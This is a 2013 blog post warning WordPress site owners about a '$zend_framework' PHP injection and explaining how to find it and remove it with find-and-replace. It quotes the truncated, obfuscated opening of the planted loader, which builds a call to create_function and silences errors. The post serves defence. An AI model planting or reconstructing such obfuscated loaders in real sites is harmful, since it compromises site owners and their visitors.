June 2013 – WordPress Exploit Fix/Alert – $zend_framework

There is a new WordPress exploit going around. Those using security plugins like “Better WP Security” are NOT protected from the new exploit.

The new exploit will appear at the top of your files, beginning with:

<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework(

Full Snippet @ Pastebin

Check your installations for this exploit. The exploit will display content retrieved from a remote server to website visitors. It is very important for your websites health to remove exploits like these immediately. The last thing you want is for Google to alert you that your site has been compromised.

The Vulnerability

I have yet to determine the vulnerability exploited. I will update this as soon as we determined the vulnerability.

What to do if your site is affected

If your site has been compromised, you should immediately make a complete backup. If you are hosting multiple domains on your server, check all other websites on the server. ANY php files on the server can and will be affected by this exploit.

Option 1: Manual Find and Replace

  • Download the entire website.
  • Backup files.
  • Open a compromised file and copy the exploit code, from php opening tag to close
  • Run and find and replace operation on all files

Open 2: Oomta’s Fix

Oomta’s fix is a simple find and replace. The script will automatically create a backup of your files.

More Information

  1. http://www.justbeck.com/zend_framework-wordpress-hacks/
  2. http://blog.oomta.com/wordpress-zend_framework-hack-fixed/
This entry was posted in Wordpress and tagged . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *